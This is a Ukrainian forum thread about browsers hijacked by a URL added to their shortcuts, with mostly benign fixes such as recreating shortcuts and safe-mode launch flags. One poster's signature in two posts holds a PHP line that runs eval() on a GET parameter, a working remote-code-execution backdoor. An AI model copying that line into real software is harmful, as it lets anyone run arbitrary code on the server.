1 Востаннє редагувалося dmyutro (10.03.2014 00:03:14)

Тема: Проблеми з браузерами

Щось сталось з усіма браузерами на ноуті. Тільки відкриваю нове вікно браузера відкривається нова вкладка (за промовчуванням)  і якийсь сайт з браузерними іграми. Допоможіть вирішити проблему.

2

Re: Проблеми з браузерами

use linux;

3

Re: Проблеми з браузерами

Я розумію що Linux такого б не допустив, але в мене Windows,тож допоможіть з тим щось зробити.

Re: Проблеми з браузерами

dmyutro написав:

Я розумію що Linux такого б не допустив, але в мене Windows,тож допоможіть з тим щось зробити.

Тут тяжко зразу сказати у чому проблема, потрібно шаритися у налаштуваннях браузерів.
З самого початку спробуйте відновити дефолтні налаштування браузера.

Подякували: dmyutro1

5

Re: Проблеми з браузерами

Спробувати створити нові профілі для переглядачів ХТЕМЕЛЬ, видалити програми, додатки яких ви не встановлювали. Запустити антивірус щоб він просканував все (у Dr. Web є пробний період).

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: dmyutro1

6 Востаннє редагувалося dmyutro (10.03.2014 11:08:08)

Re: Проблеми з браузерами

Ось що я виявив в ярликах браузерів

Там де поле  об'єкт  Додатково пише ще сайт  "http://la1mida.ru/"

Пробував вирізати це - вирізав , натиснув "ок" і ще раз запустив браузер нічого не допомогло (посилання появилось ще раз)

7

Re: Проблеми з браузерами

Я повидаляв усі ярлики браузерів, і забрав їх з панелі.
Після того створив нові і покріпив до панелі. Тепер працює все "GOOD". Всім дякую.

8

Re: Проблеми з браузерами

Сучасний софт уже неможна встановлювати тупо натискаючи "Далі", бо такого сміття понавстановлюєте, тиждень потім вигрібатимете. Обов'язково треба дивитися, чи не пропонують вам встановити якісь лайно-додатки чи "покращити" налаштування системи, і знімати галочки.

Подякували: dmyutro1

9

Re: Проблеми з браузерами

dmyutro написав:

Щось сталось з усіма браузерами на ноуті. Тільки відкриваю нове вікно браузера відкривається нова вкладка (за промовчуванням)  і якийсь сайт з браузерними іграми. Допоможіть вирішити проблему.

Ніяких проблем насправді немає. Просто "Пересоздайте ярлыки для браузеров." Ось і все, що потрібно зробити. І не слухай більш болтунів, що вважають себе занадто розумними. ))))

Два Рима убо падоша, а третий стоит, а четвертому не быти

10

Re: Проблеми з браузерами

Dr.Web CureIt

Прихований текст
Вже таке ніби питали?
<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

11

Re: Проблеми з браузерами

zwz051 написав:
dmyutro написав:

Щось сталось з усіма браузерами на ноуті. Тільки відкриваю нове вікно браузера відкривається нова вкладка (за промовчуванням)  і якийсь сайт з браузерними іграми. Допоможіть вирішити проблему.

Ніяких проблем насправді немає. Просто "Пересоздайте ярлыки для браузеров." Ось і все, що потрібно зробити. І не слухай більш болтунів, що вважають себе занадто розумними. ))))

Я так і зробив... Почитайте зверху..

dmyutro написав:

Я повидаляв усі ярлики браузерів, і забрав їх з панелі.
Після того створив нові і покріпив до панелі. Тепер працює все "GOOD". Всім дякую.

12 Востаннє редагувалося HetmanNet (27.04.2014 17:55:45)

Re: Проблеми з браузерами

dmyutro написав:

Щось сталось з усіма браузерами на ноуті. Тільки відкриваю нове вікно браузера відкривається нова вкладка (за промовчуванням)  і якийсь сайт з браузерними іграми. Допоможіть вирішити проблему.

Якщо колись буде біда, що як не запускай фіг допоможе (тобто автоматом відкривається якась фігня яку не прибрати). Запусти у безпечному режимі, справжні браузери такі як Firefox і Chrom його мають. Видаліть всі плагіни і додатки, почистіть кеш, встановіть гугол як домашню сторінку.
Для Firefox в Linux (на Вінді від Лайнософт схоже) в безпечному режимі запускають командою:

firefox -safe-mode

Для Chrome в Linux (ну на продуктах Лайнософта самі розбиретеся з командною строкою) без плагінів запуск роблять командою:

google-chrome --disable-extensions

Якось таке роблять в Opera, а в IE того ніяк зробити.. ну хоча би нікого не знаю, хто би знав як то зробити..

Віддамся на один вечір в хороші дівочі руки.. не дорого, в у.о. .. Якщо сподобається, то залишуся безкоштовно назавжди..

13

Re: Проблеми з браузерами

HetmanNet написав:

в IE того ніяк зробити.. ну хоча би нікого не знаю, хто би знав як то зробити..

Пуск -> Стандартні програми -> Система Windows -> Internet Explorer (без додаткових компонентів)
або "iexplore -extoff"
Але краще за все усе ж не ставити собі на комп усякого г****.